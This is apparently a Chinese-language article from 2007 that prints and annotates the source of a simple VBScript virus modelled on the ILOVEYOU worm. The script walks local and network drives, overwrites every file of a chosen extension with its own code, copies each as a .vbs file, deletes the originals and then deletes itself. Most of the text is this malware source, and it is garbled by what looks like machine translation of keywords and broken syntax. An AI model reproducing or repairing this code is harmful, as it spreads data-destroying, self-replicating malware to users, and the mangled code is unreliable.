vbs病毒的一个简单例子源代码分析
2007-03-26 00:00:00作者:
vbs病毒的一个简单例子源代码分析
说明:作者修改了部分代码。 这个文件是一个完整的程序。 运行此文件时,它将查找并强制复盖硬盘上符合条件的所有文件(所有符合条件的文件数据都将丢失),并创建另一个文件名相同但带有. vbs的文件。 因此,请注意破坏测试条件的设定,绝对不要对他人进行测试。 否则,一切后果都会自负。 如果系统不支持. vbs,则可以将后缀更改为. vbe
dimfolder,fso,foldername,f,d,dc
set FSO=createobject (scripting.file system object ) )。
set self=FSO.opentextfile (wscript.script full name,1 )。
vbscopy=self.readall '读取病毒以备复制到文件
self.close
setdc=fso.Drives
foreachdindc
ifd.drive type=3ord.drive type=2then '检查磁盘类型
驱动器盘符将显示在wscript.echod '弹出窗口中
是扫描(d )
最终幻想
下一步
lsfile=wscript.scriptfullname '此脚本程序路径
SETLsfile=FSO.getfile(lsfile ) )。
lsfile.delete(true ) )病毒运行后自行清除(本人自加,爱虫病毒本身没有该代码) )。
UBScan(Folder_ ) )
onerrorresumenext
setfolder _=FSO.getfolder (folder _ ) )。
setfiles=folder_.files
foreachfileinfiles
获取EXT=FSO.getextensionname(file ) '文件后缀
ext=lcase(ext ) '将扩展名转换为小写
如果ifext='mp5'then '扩展名为mp5,则当然不存在这样的文件。 这里可以自己修改,请注意。 请自己创建扩展名合适的文件。 最好扩展名不正常
setap=FSO.opentextfile (file.path,2,true ) ) ) ) ) ) ) ) )。
“ap.writevbscopy”覆盖并谨慎使用文件
ap.close
setCOP=FSO.getfile(file.path ) ) )。
cop.copy(file.path'.vbs ' )创建单独的病毒文件
删除file.delete(true )原始文件
最终幻想
下一步
set sub folders=folder _.sub folders
foreachsubfolderinsubfolders '搜索其他目录
扫描(子文件夹)
下一步
最终辅